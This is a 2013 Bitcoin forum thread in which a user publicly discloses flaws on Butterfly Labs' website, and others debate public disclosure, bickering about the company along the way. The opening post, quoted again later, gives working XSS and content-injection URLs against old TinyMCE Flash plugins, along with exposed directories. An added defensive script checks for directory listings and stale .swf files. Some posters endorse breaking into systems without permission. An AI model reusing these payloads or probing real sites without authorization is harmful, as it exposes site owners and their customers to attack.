Bitcoin Forum

Economy => Service Discussion => Topic started by: n4ru on May 03, 2013, 01:24:41 AM



Title: BFL's site is incredibly amateur...
Post by: n4ru on May 03, 2013, 01:24:41 AM
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and its swfupload XSS. There are 2 separate XSSes here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done ;)
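A defender-side check for the two classes of problem listed in the post above, added here as an example and not code from the thread or from BFL: it flags an HTTP response body that is a server-generated directory index, and it walks a document root for the stale Flash components (swfupload.swf from the archiv plugin, moxieplayer.swf from the media plugin) that old TinyMCE plugin bundles shipped and that stay reachable as static files whether or not the editor still uses them. The sample HTML and the temporary directory tree are constructed for the demo; the filenames and plugin paths are taken from the URLs in the post.

```python
"""Defender-side audit for the two findings in the post above: directory
listing left enabled, and stale Flash components from old TinyMCE plugins
still served as static files. Added example, not code from the thread."""
import os
import re
import tempfile
from typing import List

# Markers typical of server-generated index pages (Apache mod_autoindex,
# nginx autoindex, IIS directory browsing).
LISTING_MARKERS = (
    re.compile(r"<title>\s*Index of /", re.I),
    re.compile(r"<h1>\s*Index of /", re.I),
    re.compile(r"\[To Parent Directory\]", re.I),
)

# Flash files the post found under tiny_mce/plugins; old plugin bundles
# shipped them and they stay reachable even when the editor never loads them.
STALE_SWF_NAMES = {"swfupload.swf", "moxieplayer.swf"}

# Constructed sample responses (not captured from any real site).
SAMPLE_LISTING = """<html><head><title>Index of /images/users</title></head>
<body><h1>Index of /images/users</h1><pre><a href="../">Parent Directory</a>
<a href="000/">000/</a>   06-Apr-2012 02:15   -
</pre></body></html>"""
SAMPLE_PAGE = "<html><head><title>Example Shop</title></head><body>Welcome</body></html>"


def is_directory_listing(body: str) -> bool:
    """True when a response body looks like an auto-generated directory
    index rather than a page the site author wrote."""
    return any(marker.search(body) for marker in LISTING_MARKERS)


def find_stale_swf(webroot: str) -> List[str]:
    """Walk the document root and return webroot-relative paths of known
    stale Flash components located under any tiny_mce/plugins directory."""
    hits = []
    for dirpath, _subdirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        if "tiny_mce/plugins" not in rel_dir:
            continue
        for name in files:
            if name.lower() in STALE_SWF_NAMES:
                hits.append(f"{rel_dir}/{name}")
    return sorted(hits)


def build_demo_webroot() -> str:
    """Create a throwaway document root that mirrors the plugin layout from
    the post (constructed for the demo; file contents are placeholder bytes)."""
    root = tempfile.mkdtemp(prefix="webroot_demo_")
    for rel in (
        "js/tiny_mce/plugins/archiv/swf/swfupload.swf",
        "js/tiny_mce/plugins/media/moxieplayer.swf",
        "js/tiny_mce/tiny_mce.js",      # legitimate editor file, must not be flagged
        "images/users/readme.txt",      # ordinary content, must not be flagged
    ):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"placeholder")
    return root


if __name__ == "__main__":
    print("sample listing detected:", is_directory_listing(SAMPLE_LISTING))
    print("normal page detected as listing:", is_directory_listing(SAMPLE_PAGE))
    for hit in find_stale_swf(build_demo_webroot()):
        print("stale Flash component:", hit)
```

The fix the post asks for is a server setting rather than a file change: `Options -Indexes` in Apache or `autoindex off;` in nginx turns listing off. The .swf files are best removed outright (or the plugins upgraded), because a static file under the web root is served regardless of whether any page still references it.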


Title: Re: BFL's site is incredibly amateur...
Post by: mustyoshi on May 03, 2013, 02:12:58 AM
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.


Title: Re: BFL's site is incredibly amateur...
Post by: Todamont on May 03, 2013, 02:31:04 AM
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.


Title: Re: BFL's site is incredibly amateur...
Post by: n4ru on May 03, 2013, 03:03:18 AM
Quote from: mustyoshi
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.

The fastest way to get anything fixed is public outing.


Title: Re: BFL's site is incredibly amateur...
Post by: freedomno1 on May 03, 2013, 03:11:20 AM
That's weak coding. Nice infiltration, I do that myself sometimes.
http://www.butterflylabs.com/images/admin/butterfly-admin.jpg


Title: Re: BFL's site is incredibly amateur...
Post by: mustyoshi on May 03, 2013, 03:12:22 AM
Quote from: n4ru
Quote from: mustyoshi
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.

The fastest way to get anything fixed is public outing.

It's fine and dandy to believe that, except by outing this, you've put other people's information at risk. Let's say somebody does get into BFL's systems, what kind of information do you think they have stored on their servers? Information that somebody who has a vendetta against bitcoin could put to good use, such as the mailing addresses of tens of thousands of people. Not to mention any related payment information.


Title: Re: BFL's site is incredibly amateur...
Post by: freedomno1 on May 03, 2013, 03:17:56 AM
Not the right directory I believe


Title: Re: BFL's site is incredibly amateur...
Post by: wabber on May 03, 2013, 07:24:59 AM
Quote from: Todamont
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all some programmers think about while they are coding is that it has to work during their 10-second test, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroy my hard work."
Breaking into systems and thereby exposing people to public laughter must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.


Title: Re: BFL's site is incredibly amateur...
Post by: n4ru on May 03, 2013, 07:36:16 AM
Quote from: wabber
Quote from: Todamont
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all some programmers think about while they are coding is that it has to work during their 10-second test, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroy my hard work."
Breaking into systems and thereby exposing people to public laughter must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.

Well said.


Title: Re: BFL's site is incredibly amateur...
Post by: freedomno1 on May 03, 2013, 08:39:02 AM
Quote from: n4ru
Quote from: wabber
Quote from: Todamont
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all some programmers think about while they are coding is that it has to work during their 10-second test, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroy my hard work."
Breaking into systems and thereby exposing people to public laughter must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.

Well said.

Agreed, hackers like exploring architecture and systems; it's a natural instinct and curiosity. Just make a good defense so we can learn :)
'Sides, when we say evil hackers we mean evil crackers lol (evil soda crackers :) since they are the new overlords XD


Title: Re: BFL's site is incredibly amateur...
Post by: Inaba on May 03, 2013, 03:49:24 PM
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.



Title: Re: BFL's site is incredibly amateur...
Post by: dhenson on May 03, 2013, 06:12:43 PM
Quote from: Inaba
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

Say what you will about Josh's usual responses, but this IMO was the perfect reaction to this situation.

Crack the whip!


Title: Re: BFL's site is incredibly amateur...
Post by: n4ru on May 03, 2013, 08:40:23 PM
Quote from: Inaba
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.


At least you guys responded to this quickly and got it fixed. There was a lot more that could have been done with malicious intent.


Title: Re: BFL's site is incredibly amateur...
Post by: sgbett on May 03, 2013, 09:39:52 PM
You posted it because you wanted to flex your e-peen.

I'm sure everyone is glad that you decided their time was best spent fixing this.


Title: Re: BFL's site is incredibly amateur...
Post by: MPOE-PR on May 03, 2013, 11:56:45 PM
Quote from: n4ru
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and its swfupload XSS. There are 2 separate XSSes here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done ;)

Pretty lulzy stuff.

Quote from: Todamont
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Yeah, right. In you know...Iran. Or whatever other shithole noncountry.


Title: Re: BFL's site is incredibly amateur...
Post by: Deafboy on May 04, 2013, 12:05:09 AM
At first I wanted to mention Aaron Swartz as a counter-argument, but realized that MPOE-PR is right. Mostly shithole noncountries like Iran, USA or China are affected :)
edit: to be a little positive +1 for Inaba's reaction.


Title: Re: BFL's site is incredibly amateur...
Post by: sgbett on May 11, 2013, 01:00:25 AM
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?


Title: Re: BFL's site is incredibly amateur...
Post by: Phinnaeus Gage on May 11, 2013, 05:41:45 AM
Here's something interesting: http://webcache.googleusercontent.com/search?q=cache:V2NAhB0iUlwJ:butterflylabs.com/images/users/000/003/366/066/imageGallery/+&cd=2&hl=en&ct=clnk&gl=us

Quote
FAA Letter-Approval0001.jpg     06-Apr-2012 02:15    31K

I only know of one pilot associated with Butterfly Labs, and that person wouldn't have had access to BFL's computer at that time because https://bitcointalk.org/index.php?topic=97269.msg1071218#msg1071218

It's a shame that image is no longer available. Or is it?


Title: Re: BFL's site is incredibly amateur...
Post by: MPOE-PR on May 11, 2013, 12:27:01 PM
Quote from: sgbett
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropriate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides (https://bitcointalk.org/index.php?topic=110868.msg1210400#msg1210400), Zerlan (http://josh-zerlan.com) etc)?


Title: Re: BFL's site is incredibly amateur...
Post by: smoothie on May 12, 2013, 09:07:56 AM
Quote from: Inaba
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.



Everything? Oh you mean like those half-assed updates that have no substance? Rrrrright lol

Don't make me laugh Joshy-boy.


Title: Re: BFL's site is incredibly amateur...
Post by: Phinnaeus Gage on May 12, 2013, 05:25:59 PM
Quote from: Inaba
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

The guy claims to do everything, but denies being the Project Manager, even though BFL doesn't officially have one, with him being the COO taking up that role.

I fed your chicken, Jody.
Sonny, I let the gardener go home early, therefore I'll finish planting the flowers.
I'll get that pallet, Dave.
This is the way we mop the floors, mop the floors, mop the floors...
"Cocksucker!" I love answering the emails.
"Any questions, folks, before we end the daily tour at BFL?"
"Acme Components? Yes, we would like to double our order. Make that 40 resisters, 10 power packs..."
So many anniversaries this month, luckily they have me in charge of the party supplies.
"Therefore, Bob, if you cancel your order, you'll lose your place in the queue. Do you really want to cancel, for we is about to ship. Honest Abe! Fine, and for not canceling we're sending you a 10% off coupon to offset the next price increase." Click! "Fuckin' cocksucker!"
Note to self: Make sure there's no known anomalies on the website today.
"One, two, three, four, five... I love counting fans in the warehouse."
Shoutbox: I confirm that bet.
Twitter: I AND BFL confirm our bets.
BT: It's a bet.
BFL Forum: That is why we bet...
Bum on the street: Sorry, bud. I gave my last real money at CES to some dude with a camera.
All my bags are packed, and I'm on the road again, (different song-->) https://www.youtube.com/watch?v=-cfc3rCQOuU


Title: Re: BFL's site is incredibly amateur...
Post by: sgbett on May 15, 2013, 01:12:27 PM
Quote from: MPOE-PR
Quote from: sgbett
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropriate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides (https://bitcointalk.org/index.php?topic=110868.msg1210400#msg1210400), Zerlan (http://josh-zerlan.com) etc)?

Yes, I certainly agree it's a tough call between protecting the innocent, and tarring and feathering incompetent admins into taking action.

I think the way that guy did it was better: "you register, I'll show you I can get your pw hash" is a good mix of publicly outing them without actually posting the vulnerability itself letter by letter.

(also sorry for MPOE typo on my previous post... autocorrect :/  )

Maybe my opinion is coloured by me having an outstanding order with BFL, but I'm still giving them the benefit of the doubt, in that I understand what they are doing is hard. Maybe that makes me a sucker, time will tell, and if I do lose that money, well, that will be another one to chalk up to experience. I'm not so naive as to think that every btc 'investment' I make is gonna pay out. Anyway, I think that's a different subject!

Me I'd have contacted them at first, and *then* when they didn't do anything start escalating.